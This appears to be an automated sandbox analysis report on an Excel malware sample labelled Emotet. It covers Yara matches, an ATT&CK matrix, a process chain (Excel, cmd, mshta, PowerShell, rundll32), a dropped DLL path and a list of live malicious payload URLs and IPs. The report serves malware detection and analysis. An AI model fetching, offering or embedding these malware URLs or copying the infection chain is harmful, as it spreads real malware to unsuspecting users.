                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration2
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer122
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials1
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562418 Sample: CJ68000754184.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 43 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\CJ68000754184.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States 23->57 59 jurnalpjf.lan.go.id 103.206.244.105, 49170, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\...\wpnzacwyitgbmx.rxn (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            CJ68000754184.xls13%VirustotalBrowse
                            CJ68000754184.xls19%ReversingLabsDocument-Excel.Trojan.Emotet

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\JooSee.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            10.2.rundll32.exe.340000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.1b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2ed0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.3110000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.4b0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2870000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            9.2.rundll32.exe.250000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2100000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.970000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.2d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.3180000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.29e0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2130000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2e40000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.23a0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2370000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2e10000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.300000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2870000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.680000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2790000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.4b0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.480000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2de0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.390000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2410000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2650000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.370000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2e70000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.28e0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2920000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.a00000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2910000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.27b0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.4a0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2730000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.360000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.30e0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.3110000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.22f0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.940000.4.unpack100%AviraHEUR/AGEN.1145233Download File

                            Domains

                            SourceDetectionScannerLabelLink
                            hostfeeling.com11%VirustotalBrowse
                            jurnalpjf.lan.go.id1%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://maxtdeveloper.com/okw9yx/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/PE3100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/f100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3100%Avira URL Cloudmalware
                            http://hostfeeling.com/wp-admin/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3100%Avira URL Cloudmalware
                            http://www.protware.com/ll0%Avira URL Cloudsafe
                            https://property-eg.com/mlzkir/97v/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            http://91.240.118.172/gg/ff/fe.png100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.pngPE30%Avira URL Cloudsafe
                            http://www.protware.com/0%URL Reputationsafe
                            http://jurnalpjf.lan.go.id/asset0%Avira URL Cloudsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-adm100%Avira URL Cloudmalware
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html0%Avira URL Cloudsafe
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/100%Avira URL Cloudmalware
                            http://hostfeeling.com100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com100%Avira URL Cloudmalware
                            http://it-o.biz/0%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id/assets/iM/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp0%Avira URL Cloudsafe
                            http://daisy.suk0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlngs0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlb0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmld0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlmshta0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlWinSta00%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.html_0%Avira URL Cloudsafe
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/97v/PE3100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/9100%Avira URL Cloudmalware
                            http://91.240.118.1720%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmll0%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id0%Avira URL Cloudsafe
                            http://www.protware.com0%URL Reputationsafe
                            http://www.protware.comP0%Avira URL Cloudsafe
                            http://activetraining.sytes.net/libraries/8s/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlfunction0%Avira URL Cloudsafe
                            http://totalplaytuxtla.com/sitio0%Avira URL Cloudsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/libraries/8s/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.p0%Avira URL Cloudsafe
                            http://gardeningfilm.com/wp-cont100%Avira URL Cloudmalware
                            http://jurnalpjf.lan.go.id/assets/iM/PE3100%Avira URL Cloudmalware
                            http://www.protware.com/r0%Avira URL Cloudsafe
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            hostfeeling.com
                            		164.90.147.135
                            		truetrueunknown
                            jurnalpjf.lan.go.id
                            		103.206.244.105
                            		truefalseunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://91.240.118.172/gg/ff/fe.pngtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://jurnalpjf.lan.go.id/assets/iM/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmltrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://maxtdeveloper.com/okw9yx/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/bitrix/xoDdDe/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fpowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.com/wp-admin/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.protware.com/llmshta.exe, 00000004.00000003.441443397.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420217264.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446302477.0000000003AAE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://property-eg.com/mlzkir/97v/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.11powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		low
